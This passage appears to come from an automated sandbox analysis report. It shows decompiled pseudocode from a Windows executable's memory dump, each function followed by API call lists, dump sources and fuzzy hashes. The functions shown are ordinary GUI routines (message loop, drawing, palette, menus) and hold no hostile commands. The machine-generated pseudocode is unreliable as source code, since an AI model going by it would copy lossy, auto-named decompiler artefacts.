                                  													__eflags = _t102;
                                  													if(_t102 < 0) {
                                  														_t103 = _v8;
                                  														__eflags =  *((char*)(_t103 + 0x248));
                                  														if( *((char*)(_t103 + 0x248)) == 0) {
                                  															 *((intOrPtr*)( *_v8 + 0x138))();
                                  														}
                                  														__eflags = _t160->message - 0x104;
                                  														if(_t160->message != 0x104) {
                                  															L40:
                                  															__eflags = _t160->wParam - 0x70;
                                  															if(_t160->wParam != 0x70) {
                                  																L43:
                                  																 *((intOrPtr*)( *((intOrPtr*)(E0048CF44(_v8[0xac]))) - 0x14))();
                                  															} else {
                                  																_t108 = E0045E5B0();
                                  																_t184 =  *0x48eb04; // 0x4
                                  																__eflags = _t184 - _t108;
                                  																if(_t184 == _t108) {
                                  																	_t110 =  *((intOrPtr*)( *_v8 + 0x104))();
                                  																	__eflags = _t110;
                                  																	if(_t110 == 0) {
                                  																		goto L43;
                                  																	}
                                  																}
                                  															}
                                  														} else {
                                  															__eflags = _t160->wParam - 0x12;
                                  															if(_t160->wParam != 0x12) {
                                  																goto L40;
                                  															} else {
                                  																 *((intOrPtr*)( *_v8 + 0x17c))();
                                  																_v8[0xa2] = 1;
                                  																TranslateMessage(_t160);
                                  																DispatchMessageA(_t160);
                                  															}
                                  														}
                                  													} else {
                                  														_t119 = _t102 + 0xffffff09 - 0xb;
                                  														__eflags = _t119;
                                  														if(_t119 < 0) {
                                  															_t169 =  *_v8;
                                  															 *((intOrPtr*)( *_v8 + 0x178))();
                                  														} else {
                                  															__eflags = _t119 == 0xae16;
                                  															if(_t119 == 0xae16) {
                                  																goto L34;
                                  															} else {
                                  																goto L48;
                                  															}
                                  														}
                                  													}
                                  												}
                                  											}
                                  										} else {
                                  											__eflags = _t88 - 0xa1;
                                  											if(__eflags > 0) {
                                  												_t129 = _t88 - 0xa4;
                                  												__eflags = _t129;
                                  												if(_t129 == 0) {
                                  													goto L34;
                                  												} else {
                                  													__eflags = _t129 == 3;
                                  													if(_t129 == 3) {
                                  														goto L34;
                                  													} else {
                                  														goto L48;
                                  													}
                                  												}
                                  											} else {
                                  												if(__eflags == 0) {
                                  													L34:
                                  													 *((intOrPtr*)( *_v8 + 0x17c))();
                                  													E0048F7FC(_v8[0xb1]);
                                  													DispatchMessageA(_t160);
                                  												} else {
                                  													_t131 = _t88 - 0x10;
                                  													__eflags = _t131;
                                  													if(_t131 == 0) {
                                  														goto L34;
                                  													} else {
                                  														__eflags = _t131 == 0x3d;
                                  														if(_t131 == 0x3d) {
                                  															_t133 = E0045E5B0();
                                  															_t190 =  *0x48eb00; // 0x0
                                  															__eflags = _t190 - _t133;
                                  															if(_t190 == _t133) {
                                  																_t137 = E0048E460(E0048CF44(_v8[0xac]));
                                  																__eflags = _t137;
                                  																if(_t137 != 0) {
                                  																	_t142 =  *(E0048E460(E0048CF44(_v8[0xac])) + 0x64);
                                  																	__eflags = _t142;
                                  																	if(_t142 == 0) {
                                  																		_t148 =  *0x4bb224; // 0x4bcb80
                                  																		_t142 =  *( *((intOrPtr*)( *_t148 + 0x6c)) + 0x158);
                                  																	}
                                  																	_t191 =  *0x4bb224; // 0x4bcb80
                                  																	_t193 =  *((intOrPtr*)( *_t191 + 0x6c));
                                  																	__eflags =  *(_t193 + 0x228) & 0x00000008;
                                  																	if(( *(_t193 + 0x228) & 0x00000008) == 0) {
                                  																		_t194 =  *0x4bb048; // 0x4bcb7c
                                  																		E00467A3C( *_t194, _t160, _t142, _t200, _t201);
                                  																	} else {
                                  																		_t169 = _t142;
                                  																		E00467AC4();
                                  																	}
                                  																}
                                  															}
                                  														} else {
                                  															L48:
                                  															TranslateMessage(_t160);
                                  															DispatchMessageA(_t160);
                                  														}
                                  													}
                                  												}
                                  											}
                                  										}
                                  										E0048D7F4(_v8);
                                  									} else {
                                  										TranslateMessage(_t160);
                                  										DispatchMessageA(_t160);
                                  									}
                                  								} else {
                                  									_t153 =  *0x4bb048; // 0x4bcb7c
                                  									if(E00467060( *_t153, _t169, _t160) == 0) {
                                  										goto L7;
                                  									}
                                  								}
                                  							} else {
                                  								_t177 =  *0x48c75c; // 0x48c7a8
                                  								if(E004037A4(_v8[0xb1], _t177) == 0) {
                                  									goto L5;
                                  								}
                                  							}
                                  						}
                                  					} while (_v8[0xa5] != 0);
                                  					_pop(_t178);
                                  					 *[fs:eax] = _t178;
                                  					return  *((intOrPtr*)( *_v8 + 0x158))(0x48eaf5);
                                  				}
                                  			}


                                  APIs
                                  • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 0048E80C
                                  • TranslateMessage.USER32 ref: 0048E869
                                  • DispatchMessageA.USER32 ref: 0048E86F
                                  • DispatchMessageA.USER32 ref: 0048E9BF
                                  • TranslateMessage.USER32 ref: 0048EA07
                                  • DispatchMessageA.USER32 ref: 0048EA0D
                                  • TranslateMessage.USER32 ref: 0048EAA6
                                  • DispatchMessageA.USER32 ref: 0048EAAC
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: Message$Dispatch$Translate$Peek
                                  • String ID:
                                  • API String ID: 1308778987-0
                                  • Opcode ID: 8d4bd43bda6d412dca720c7a32a38a2b0f34be78a75fe232c367920ec95a1ece
                                  • Instruction ID: 69ee7b768b0eae88f949a84d3c3048f74d743dabf59ebc530503d33c9ff2a926
                                  • Opcode Fuzzy Hash: 8d4bd43bda6d412dca720c7a32a38a2b0f34be78a75fe232c367920ec95a1ece
                                  • Instruction Fuzzy Hash: 4F91A034604104DFDB04FF2AC9C9A9EB7B1BF45304F2489F6E8059B396CB38AE419B59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 55%
                                  			E00454D44(void* __eax, void* __ecx, intOrPtr __edx, void* __eflags, char _a4, intOrPtr _a8, int _a12, int _a16) {
                                  				intOrPtr _v8;
                                  				struct HDC__* _v12;
                                  				char _v28;
                                  				char _v44;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __ebp;
                                  				void* _t46;
                                  				void* _t57;
                                  				int _t85;
                                  				void* _t119;
                                  				void* _t120;
                                  				void* _t129;
                                  				struct HDC__* _t138;
                                  				struct HDC__* _t139;
                                  				int _t140;
                                  				void* _t141;
                                  
                                  				_t121 = __ecx;
                                  				_t137 = __ecx;
                                  				_v8 = __edx;
                                  				_t120 = __eax;
                                  				_t46 = E00454508(__eax);
                                  				if(_t46 != 0) {
                                  					_t144 = _a4;
                                  					if(_a4 == 0) {
                                  						__eflags =  *(_t120 + 0x54);
                                  						if( *(_t120 + 0x54) == 0) {
                                  							_t140 = E0042D2EC(1);
                                  							 *(_t120 + 0x54) = _t140;
                                  							E0042E778(_t140, 1);
                                  							 *((intOrPtr*)( *_t140 + 0x40))();
                                  							_t121 =  *_t140;
                                  							 *((intOrPtr*)( *_t140 + 0x34))();
                                  						}
                                  						E00428C64( *((intOrPtr*)(E0042D8BC( *(_t120 + 0x54)) + 0x14)), _t121, 0xffffff, _t137, _t141, __eflags);
                                  						E0041B1E4(0, _t120,  *(_t120 + 0x34), 0,  &_v44,  *(_t120 + 0x30));
                                  						_push( &_v44);
                                  						_t57 = E0042D8BC( *(_t120 + 0x54));
                                  						_pop(_t129);
                                  						E00429008(_t57, _t129);
                                  						_push(0);
                                  						_push(0);
                                  						_push(0xffffffff);
                                  						_push(0);
                                  						_push(0);
                                  						_push(0);
                                  						_push(0);
                                  						_push(E004294DC(E0042D8BC( *(_t120 + 0x54))));
                                  						_push(_v8);
                                  						_push(E004546DC(_t120));
                                  						L0042FD10();
                                  						E0041B1E4(_a16, _t120, _a16 +  *(_t120 + 0x34), _a12,  &_v28, _a12 +  *(_t120 + 0x30));
                                  						_v12 = E004294DC(E0042D8BC( *(_t120 + 0x54)));
                                  						E00428C64( *((intOrPtr*)(_t137 + 0x14)), _a16 +  *(_t120 + 0x34), 0xff000014, _t137, _t141, __eflags);
                                  						_t138 = E004294DC(_t137);
                                  						SetTextColor(_t138, 0xffffff);
                                  						SetBkColor(_t138, 0);
                                  						_t85 = _a16 + 1;
                                  						__eflags = _t85;
                                  						BitBlt(_t138, _t85, _a12 + 1,  *(_t120 + 0x34),  *(_t120 + 0x30), _v12, 0, 0, 0xe20746);
                                  						E00428C64( *((intOrPtr*)(_t137 + 0x14)), _a16 +  *(_t120 + 0x34), 0xff000010, _t137, _t141, _t85);
                                  						_t139 = E004294DC(_t137);
                                  						SetTextColor(_t139, 0xffffff);
                                  						SetBkColor(_t139, 0);
                                  						return BitBlt(_t139, _a16, _a12,  *(_t120 + 0x34),  *(_t120 + 0x30), _v12, 0, 0, 0xe20746);
                                  					}
                                  					_push(_a8);
                                  					_push(E00454304(_t144));
                                  					E00454D1C(_t120, _t144);
                                  					_push(E00454304(_t144));
                                  					_push(0);
                                  					_push(0);
                                  					_push(_a12);
                                  					_push(_a16);
                                  					_push(E004294DC(__ecx));
                                  					_push(_v8);
                                  					_t119 = E004546DC(_t120);
                                  					_push(_t119);
                                  					L0042FD10();
                                  					return _t119;
                                  				}
                                  				return _t46;
                                  			}


                                  APIs
                                  • 73F0D9B4.COMCTL32(00000000,?,00000000,?,?,00000000,00000000,00000000,00000000,?), ref: 00454DA3
                                  • 73F0D9B4.COMCTL32(00000000,?,00000000,00000000,00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00454E44
                                  • SetTextColor.GDI32(00000000,00FFFFFF), ref: 00454E91
                                  • SetBkColor.GDI32(00000000,00000000), ref: 00454E99
                                  • BitBlt.GDI32(00000000,?,?,?,?,00000000,00000000,00000000,00E20746), ref: 00454EBE
                                    • Part of subcall function 00454D1C: 73F14419.COMCTL32(00000000,?,00454D7D,00000000,?), ref: 00454D32
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: Color$F14419Text
                                  • String ID:
                                  • API String ID: 2727074776-0
                                  • Opcode ID: 807a03ec68b9caf503f903fa4b69626018edbb5a0634d31d4e95652873268602
                                  • Instruction ID: 6aee7c2f6a2f290e834ff63392f6c7c8bdfb9d0d14efe41ad3481e3154efa7ac
                                  • Opcode Fuzzy Hash: 807a03ec68b9caf503f903fa4b69626018edbb5a0634d31d4e95652873268602
                                  • Instruction Fuzzy Hash: 65511A71700114AFDB40FF69DD82F9E37A8AF48718F50016AB905EB286CA78ED458B69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0044B5CC(void* __eax, void* __ecx, struct HDC__* __edx, void* __eflags, intOrPtr _a4) {
                                  				int _v8;
                                  				int _v12;
                                  				int _v16;
                                  				char _v20;
                                  				struct tagRECT _v36;
                                  				signed int _t54;
                                  				intOrPtr _t59;
                                  				int _t61;
                                  				void* _t63;
                                  				void* _t66;
                                  				void* _t82;
                                  				int _t97;
                                  				struct HDC__* _t98;
                                  
                                  				_t98 = __edx;
                                  				_t82 = __eax;
                                  				 *(__eax + 0x54) =  *(__eax + 0x54) | 0x00000080;
                                  				_v16 = SaveDC(__edx);
                                  				E00445658(__edx, _a4, __ecx);
                                  				IntersectClipRect(__edx, 0, 0,  *(_t82 + 0x48),  *(_t82 + 0x4c));
                                  				_t97 = 0;
                                  				_v12 = 0;
                                  				if((GetWindowLongA(E0044D590(_t82), 0xffffffec) & 0x00000002) == 0) {
                                  					_t54 = GetWindowLongA(E0044D590(_t82), 0xfffffff0);
                                  					__eflags = _t54 & 0x00800000;
                                  					if((_t54 & 0x00800000) != 0) {
                                  						_v12 = 3;
                                  						_t97 = 0xa00f;
                                  					}
                                  				} else {
                                  					_v12 = 0xa;
                                  					_t97 = 0x200f;
                                  				}
                                  				if(_t97 != 0) {
                                  					SetRect( &_v36, 0, 0,  *(_t82 + 0x48),  *(_t82 + 0x4c));
                                  					DrawEdge(_t98,  &_v36, _v12, _t97);
                                  					E00445658(_t98, _v36.top, _v36.left);
                                  					IntersectClipRect(_t98, 0, 0, _v36.right - _v36.left, _v36.bottom - _v36.top);
                                  				}
                                  				E00447F3C(_t82, _t98, 0x14, 0);
                                  				_t86 = _t98;
                                  				E00447F3C(_t82, _t98, 0xf, 0);
                                  				_t59 =  *((intOrPtr*)(_t82 + 0x19c));
                                  				if(_t59 == 0) {
                                  					L12:
                                  					_t61 = RestoreDC(_t98, _v16);
                                  					 *(_t82 + 0x54) =  *(_t82 + 0x54) & 0x0000ff7f;
                                  					return _t61;
                                  				} else {
                                  					_t63 =  *((intOrPtr*)(_t59 + 8)) - 1;
                                  					if(_t63 < 0) {
                                  						goto L12;
                                  					}
                                  					_v20 = _t63 + 1;
                                  					_v8 = 0;
                                  					do {
                                  						_t66 = E0041C834( *((intOrPtr*)(_t82 + 0x19c)), _t86, _v8);
                                  						_t106 =  *((char*)(_t66 + 0x57));
                                  						if( *((char*)(_t66 + 0x57)) != 0) {
                                  							_t86 =  *(_t66 + 0x40);
                                  							E0044B5CC(_t66,  *(_t66 + 0x40), _t98, _t106,  *((intOrPtr*)(_t66 + 0x44)));
                                  						}
                                  						_v8 = _v8 + 1;
                                  						_t36 =  &_v20;
                                  						 *_t36 = _v20 - 1;
                                  					} while ( *_t36 != 0);
                                  					goto L12;
                                  				}
                                  			}


                                  APIs
                                  • SaveDC.GDI32 ref: 0044B5E2
                                    • Part of subcall function 00445658: GetWindowOrgEx.GDI32(?), ref: 00445666
                                    • Part of subcall function 00445658: SetWindowOrgEx.GDI32(?,?,?,00000000), ref: 0044567C
                                  • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 0044B603
                                  • GetWindowLongA.USER32(00000000,000000EC), ref: 0044B619
                                  • GetWindowLongA.USER32(00000000,000000F0), ref: 0044B63B
                                  • SetRect.USER32 ref: 0044B667
                                  • DrawEdge.USER32(?,?,?,00000000), ref: 0044B676
                                  • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 0044B69B
                                  • RestoreDC.GDI32(?,?), ref: 0044B70C
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: Window$Rect$ClipIntersectLong$DrawEdgeRestoreSave
                                  • String ID:
                                  • API String ID: 2976466617-0
                                  • Opcode ID: ffac7c3a6a42a13a00be538ff204dd346e38d22295f6bb7d0bfcb5dbcce99478
                                  • Instruction ID: 699b605686fd7e0bd271cd15a7ee08c5f7261519c5c34d8b3fb60511b0893aa8
                                  • Opcode Fuzzy Hash: ffac7c3a6a42a13a00be538ff204dd346e38d22295f6bb7d0bfcb5dbcce99478
                                  • Instruction Fuzzy Hash: 55412171B002046BEB10EB99CC81F9E77A9AF45704F11416AFA04EB286DB79DD0187A9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 70%
                                  			E00429E20(void* __ebx) {
                                  				struct HDC__* _v8;
                                  				struct tagPALETTEENTRY _v1000;
                                  				struct tagPALETTEENTRY _v1004;
                                  				struct tagPALETTEENTRY _v1032;
                                  				signed int _v1034;
                                  				short _v1036;
                                  				void* _t24;
                                  				int _t53;
                                  				intOrPtr _t60;
                                  				void* _t62;
                                  				void* _t63;
                                  
                                  				_t62 = _t63;
                                  				_v1036 = 0x300;
                                  				_v1034 = 0x10;
                                  				E00402D04(_t24, 0x40,  &_v1032);
                                  				_v8 = GetDC(0);
                                  				_push(_t62);
                                  				_push(0x429f1d);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t63 + 0xfffffbf8;
                                  				_t53 = GetDeviceCaps(_v8, 0x68);
                                  				if(_t53 >= 0x10) {
                                  					GetSystemPaletteEntries(_v8, 0, 8,  &_v1032);
                                  					if(_v1004 != 0xc0c0c0) {
                                  						GetSystemPaletteEntries(_v8, _t53 - 8, 8, _t62 + (_v1034 & 0x0000ffff) * 4 - 0x424);
                                  					} else {
                                  						GetSystemPaletteEntries(_v8, _t53 - 8, 1,  &_v1004);
                                  						GetSystemPaletteEntries(_v8, _t53 - 7, 7, _t62 + (_v1034 & 0x0000ffff) * 4 - 0x420);
                                  						GetSystemPaletteEntries(_v8, 7, 1,  &_v1000);
                                  					}
                                  				}
                                  				_pop(_t60);
                                  				 *[fs:eax] = _t60;
                                  				_push(0x429f24);
                                  				return ReleaseDC(0, _v8);
                                  			}

                                  APIs
                                  • GetDC.USER32(00000000), ref: 00429E4E
                                  • GetDeviceCaps.GDI32(?,00000068), ref: 00429E6A
                                  • GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 00429E89
                                  • GetSystemPaletteEntries.GDI32(?,-00000008,00000001,00C0C0C0), ref: 00429EAD
                                  • GetSystemPaletteEntries.GDI32(?,00000000,00000007,?), ref: 00429ECB
                                  • GetSystemPaletteEntries.GDI32(?,00000007,00000001,?), ref: 00429EDF
                                  • GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 00429EFF
                                  • ReleaseDC.USER32(00000000,?), ref: 00429F17
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: EntriesPaletteSystem$CapsDeviceRelease
                                  • String ID:
                                  • API String ID: 1781840570-0
                                  • Opcode ID: e6870f2b988d07a63a19550c66dbd4e99205aba096ac8c6207aa00b79ac302ff
                                  • Instruction ID: 6076b100b9e167de9dfbf12bcb866e4c8173b1d9362c72a2a2d81eb729672600
                                  • Opcode Fuzzy Hash: e6870f2b988d07a63a19550c66dbd4e99205aba096ac8c6207aa00b79ac302ff
                                  • Instruction Fuzzy Hash: 312171B5A40318FADB10DBA5CD81FAE72ACEB08708F5144A6F704F71C1D679AE509B28
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00439510(void* __eax, void* __edx, void* __ebp, void* __eflags) {
                                  				struct tagTEXTMETRICA _v84;
                                  				signed int _v100;
                                  				void* __ebx;
                                  				void* _t15;
                                  				char* _t20;
                                  				signed int _t21;
                                  				signed int _t23;
                                  				struct HDC__* _t29;
                                  				signed int _t30;
                                  				signed int _t32;
                                  				signed int _t33;
                                  				void* _t34;
                                  				void* _t40;
                                  				struct tagTEXTMETRICA* _t42;
                                  
                                  				_t40 = __eax;
                                  				_t29 = GetDC(0);
                                  				GetTextMetricsA(_t29, _t42);
                                  				_t15 = SelectObject(_t29, E004284A4( *((intOrPtr*)(_t40 + 0x68)), _t29, _t34));
                                  				GetTextMetricsA(_t29,  &_v84);
                                  				SelectObject(_t29, _t15);
                                  				ReleaseDC(0, _t29);
                                  				_t20 =  *0x4baf14; // 0x4bcae0
                                  				if( *_t20 == 0) {
                                  					_t30 = _t42->tmHeight;
                                  					_t21 = _v100;
                                  					if(_t30 > _t21) {
                                  						_t30 = _t21;
                                  					}
                                  					_t23 = GetSystemMetrics(6) << 2;
                                  					if(_t30 < 0) {
                                  						_t30 = _t30 + 3;
                                  					}
                                  					_t32 = _t23 + (_t30 >> 2);
                                  				} else {
                                  					if( *((char*)(_t40 + 0x1a5)) == 0) {
                                  						_t33 = 6;
                                  					} else {
                                  						_t33 = 8;
                                  					}
                                  					_t32 = GetSystemMetrics(6) * _t33;
                                  				}
                                  				return E004464FC(_t40, _v100 + _t32);
                                  			}

                                  APIs
                                  • GetDC.USER32(00000000), ref: 0043951A
                                  • GetTextMetricsA.GDI32(00000000), ref: 00439523
                                    • Part of subcall function 004284A4: CreateFontIndirectA.GDI32(?), ref: 004285E2
                                  • SelectObject.GDI32(00000000,00000000), ref: 00439532
                                  • GetTextMetricsA.GDI32(00000000,?), ref: 0043953F
                                  • SelectObject.GDI32(00000000,00000000), ref: 00439546
                                  • ReleaseDC.USER32(00000000,00000000), ref: 0043954E
                                  • GetSystemMetrics.USER32 ref: 00439574
                                  • GetSystemMetrics.USER32 ref: 0043958E
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: Metrics$ObjectSelectSystemText$CreateFontIndirectRelease
                                  • String ID:
                                  • API String ID: 1583807278-0
                                  • Opcode ID: 1fa4b06cf202911a48bd5778f93d7ea433d21bb91d68bb8759a04b6c6ce5915f
                                  • Instruction ID: ae4b4b36a82c0fb24a04fc960110fbe0e47da5ab5bc52ceb76e1162106b6cb18
                                  • Opcode Fuzzy Hash: 1fa4b06cf202911a48bd5778f93d7ea433d21bb91d68bb8759a04b6c6ce5915f
                                  • Instruction Fuzzy Hash: 7A11E992B043403BF311B675CCC2B6B26C88B88358F40153EFA46963D3D5BD9C50836E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 87%
                                  			E0045769C(void* __eax, void* __ebx, char __ecx, struct HMENU__* __edx, void* __edi, void* __esi) {
                                  				char _v5;
                                  				char _v12;
                                  				char _v13;
                                  				struct tagMENUITEMINFOA _v61;
                                  				char _v68;
                                  				intOrPtr _t103;
                                  				CHAR* _t109;
                                  				char _t115;
                                  				short _t149;
                                  				void* _t154;
                                  				intOrPtr _t161;
                                  				intOrPtr _t184;
                                  				struct HMENU__* _t186;
                                  				int _t190;
                                  				void* _t192;
                                  				intOrPtr _t193;
                                  				void* _t196;
                                  				void* _t205;
                                  
                                  				_t155 = __ecx;
                                  				_v68 = 0;
                                  				_v12 = 0;
                                  				_v5 = __ecx;
                                  				_t186 = __edx;
                                  				_t154 = __eax;
                                  				_push(_t196);
                                  				_push(0x4578f7);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t196 + 0xffffffc0;
                                  				if( *((char*)(__eax + 0x3e)) == 0) {
                                  					L22:
                                  					_pop(_t161);
                                  					 *[fs:eax] = _t161;
                                  					_push(0x4578fe);
                                  					E004043D8( &_v68);
                                  					return E004043D8( &_v12);
                                  				}
                                  				E00404470( &_v12,  *((intOrPtr*)(__eax + 0x30)));
                                  				if(E00459658(_t154) <= 0) {
                                  					__eflags =  *((short*)(_t154 + 0x60));
                                  					if( *((short*)(_t154 + 0x60)) == 0) {
                                  						L8:
                                  						if((GetVersion() & 0x000000ff) < 4) {
                                  							_t190 =  *(0x4a0eb8 + ((E004047E4( *((intOrPtr*)(_t154 + 0x30)), 0x45791c) & 0xffffff00 | __eflags == 0x00000000) & 0x0000007f) * 4) |  *0x004A0EAC |  *0x004A0E9C |  *0x004A0EA4 | 0x00000400;
                                  							_t103 = E00459658(_t154);
                                  							__eflags = _t103;
                                  							if(_t103 <= 0) {
                                  								InsertMenuA(_t186, 0xffffffff, _t190,  *(_t154 + 0x50) & 0x0000ffff, E00404898(_v12));
                                  							} else {
                                  								_t109 = E00404898( *((intOrPtr*)(_t154 + 0x30)));
                                  								InsertMenuA(_t186, 0xffffffff, _t190 | 0x00000010, E00457BAC(_t154), _t109);
                                  							}
                                  							goto L22;
                                  						}
                                  						_v61.cbSize = 0x2c;
                                  						_v61.fMask = 0x3f;
                                  						_t192 = E00459C14(_t154);
                                  						if(_t192 == 0 ||  *((char*)(_t192 + 0x40)) == 0 && E00459230(_t154) == 0) {
                                  							if( *((intOrPtr*)(_t154 + 0x4c)) == 0) {
                                  								L14:
                                  								_t115 = 0;
                                  								goto L16;
                                  							}
                                  							_t205 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x4c)))) + 0x1c))();
                                  							if(_t205 == 0) {
                                  								goto L15;
                                  							}
                                  							goto L14;
                                  						} else {
                                  							L15:
                                  							_t115 = 1;
                                  							L16:
                                  							_v13 = _t115;
                                  							_v61.fType =  *(0x4a0eec + ((E004047E4( *((intOrPtr*)(_t154 + 0x30)), 0x45791c) & 0xffffff00 | _t205 == 0x00000000) & 0x0000007f) * 4) |  *0x004A0EE4 |  *0x004A0EC0 |  *0x004A0EF4 |  *0x004A0EFC;
                                  							_v61.fState =  *0x004A0ECC |  *0x004A0EDC |  *0x004A0ED4;
                                  							_v61.wID =  *(_t154 + 0x50) & 0x0000ffff;
                                  							_v61.hSubMenu = 0;
                                  							_v61.hbmpChecked = 0;
                                  							_v61.hbmpUnchecked = 0;
                                  							_v61.dwTypeData = E00404898(_v12);
                                  							if(E00459658(_t154) > 0) {
                                  								_v61.hSubMenu = E00457BAC(_t154);
                                  							}
                                  							InsertMenuItemA(_t186, 0xffffffff, 0xffffffff,  &_v61);
                                  							goto L22;
                                  						}
                                  					}
                                  					_t193 =  *((intOrPtr*)(_t154 + 0x64));
                                  					__eflags = _t193;
                                  					if(_t193 == 0) {
                                  						L7:
                                  						_push(_v12);
                                  						_push(0x457910);
                                  						E00456D00( *((intOrPtr*)(_t154 + 0x60)), _t154, _t155,  &_v68, _t193);
                                  						_push(_v68);
                                  						E00404758();
                                  						goto L8;
                                  					}
                                  					__eflags =  *((intOrPtr*)(_t193 + 0x64));
                                  					if( *((intOrPtr*)(_t193 + 0x64)) != 0) {
                                  						goto L7;
                                  					}
                                  					_t184 =  *0x456590; // 0x4565dc
                                  					_t149 = E004037A4( *((intOrPtr*)(_t193 + 4)), _t184);
                                  					__eflags = _t149;
                                  					if(_t149 != 0) {
                                  						goto L8;
                                  					}
                                  					goto L7;
                                  				}
                                  				_v61.hSubMenu = E00457BAC(_t154);
                                  				goto L8;
                                  			}

                                  APIs
                                  • InsertMenuItemA.USER32 ref: 00457848
                                  • GetVersion.KERNEL32(00000000,004578F7), ref: 00457738
                                    • Part of subcall function 00457BAC: CreatePopupMenu.USER32 ref: 00457BC7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: Menu$CreateInsertItemPopupVersion
                                  • String ID: ,$?
                                  • API String ID: 133695497-2308483597
                                  • Opcode ID: 92faf50fca7a9a6ad3f51fbb0cb8afe85ac5a6b0d9334fa202d585fb2e8049fe
                                  • Instruction ID: b431dbae6964449d4e4fdd8df006465d8f76434cbf84d7d65b725533869c4e47
                                  • Opcode Fuzzy Hash: 92faf50fca7a9a6ad3f51fbb0cb8afe85ac5a6b0d9334fa202d585fb2e8049fe
                                  • Instruction Fuzzy Hash: 0761E370A082459BDB10EF79EC8169A7BE5AF4A305B4448BAFD40E7397D738EC09C758
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 61%
                                  			E0046F680(intOrPtr __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                  				intOrPtr _v8;
                                  				int _v12;
                                  				intOrPtr _v16;
                                  				long _v20;
                                  				void* _v36;
                                  				signed int _v40;
                                  				signed int _v44;
                                  				signed int _v48;
                                  				signed int _v52;
                                  				intOrPtr _v56;
                                  				void* _v60;
